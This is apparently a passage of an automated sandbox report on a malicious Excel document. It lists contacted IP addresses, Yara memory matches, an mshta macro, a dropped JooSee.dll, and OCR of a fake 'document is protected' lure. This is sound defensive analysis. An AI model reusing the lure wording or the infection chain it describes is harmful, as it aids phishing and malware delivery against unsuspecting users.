                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: mshta.exe, 00000004.00000002.438237108.000000000029C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421193159.000000000029C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436608606.000000000029C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com{ equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000002.438237108.000000000029C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421193159.000000000029C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436608606.000000000029C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

                            E-Banking Fraud

                            barindex
                            Source: Yara matchFile source: 12.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.9c0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.31f0000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.3280000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2bd0000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.28f0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.29a0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2fb0000.24.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.24b0000.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.3030000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.870000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2ba0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.9f0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.23f0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2d50000.18.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2bd0000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.29d0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.260000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3030000.26.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.31f0000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.870000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.24b0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.30d0000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2d50000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f70000.23.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3240000.29.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.260000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.2520000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2c60000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3030000.26.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2c90000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2fb0000.24.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2810000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2c90000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.760000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2e60000.21.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.730000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.30a0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.31c0000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.730000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2d20000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.29d0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.340000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.2b0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2e30000.20.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.23a0000.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.31d0000.28.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f70000.23.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2ad0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2aa0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.9c0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.8a0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.410000.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f40000.22.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2de0000.19.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f40000.22.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2de0000.19.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2ad0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2720000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3000000.25.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.720000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.2b0000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2810000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.2330000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.3030000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.410000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.31a0000.27.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.30d0000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000D.00000002.677067947.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.453101619.0000000000150000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.678344656.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677431003.0000000002BD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509305754.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677169719.0000000002810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677889401.0000000003001000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509452651.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.676890629.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677655437.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509112369.00000000023F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.508729235.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509093299.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.508905338.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.508777741.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.511827819.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.676823540.00000000008A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.676935914.00000000009F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.676642352.0000000000730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.512005602.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.678040246.00000000031D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677708619.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.676672140.0000000000761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677290859.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677828983.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509149844.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509175911.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.678097225.0000000003241000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677992922.00000000031A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509224243.00000000028F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677771933.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.453319982.0000000000211000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677797866.0000000002F70000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677404297.0000000002BA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677466682.0000000002C61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677573347.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677263877.00000000029A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509407171.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677492210.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509387202.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.508826580.0000000000260000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677332473.0000000002AA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.508857582.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677359983.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.511919607.0000000000721000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509354773.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509069868.0000000002331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677545116.0000000002D21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509334125.00000000030A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677930195.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.508950592.0000000000410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509428106.0000000003281000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.676771447.0000000000870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677128024.0000000002721000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.453573074.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677606163.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\JooSee.dll, type: DROPPED

                            System Summary

                            barindex
                            Source: opastonline.com.xlsMacro extractor: Sheet: LINKO contains: mshta
                            Source: opastonline.com.xlsMacro extractor: Sheet: LINKO contains: mshta
                            Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
                            Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
                            Source: Screenshot number: 4Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 :: 19 20 21 22 U LI
                            Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 , , Previewing is not available for protected documents. 14
                            Source: Screenshot number: 8Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 :: 19 20 21 22 U LI 23 24 25 26 27
                            Source: opastonline.com.xlsStream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=.............................................=........p.08.......X.@...........".......................1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1.......4........h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1...,...6........h..C.a.l.i.b.r.i.1.......6........h..C.a.l.i.b.r.i.1.......6........h..C.a.l.i.b.r.i.1.......>........h..C.a.l.i.b.r.i.1.......4........h..C.a.l.i.b.r.i.1.......<........h..C.a.l.i.b.r.i.1.......?........h..C.a.l.i.b.r.i.1.*.h...6........h..C.a.l.i.b.r.i. .L.i.g.h.t.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-.......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... ............ .......... ....`....... .......... ............ .......... ............ .......... .....
                            Source: opastonline.com.xls.0.drStream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1.......4........h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1...,...6........h..C.a.l.i.b.r.i.1.......6........h..C.a.l.i.b.r.i.1.......6........h..C.a.l.i.b.r.i.1.......>........h..C.a.l.i.b.r.i.1.......4........h..C.a.l.i.b.r.i.1.......<........h..C.a.l.i.b.r.i.1.......?........h..C.a.l.i.b.r.i.1.*.h...6........h..C.a.l.i.b.r.i. .L.i.g.h.t.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-.......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... ............ .......... ....`....... .......... ............ .......... ............ .......... .....
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Source: opastonline.com.xlsInitial sample: EXEC
                            Source: opastonline.com.xlsInitial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00220001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00219011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00212051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00230056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002170B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002220BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00224116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002181B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002151BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00212251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00215361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00214346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002313AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002164E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00228519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00215548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00222550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002295FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00228606
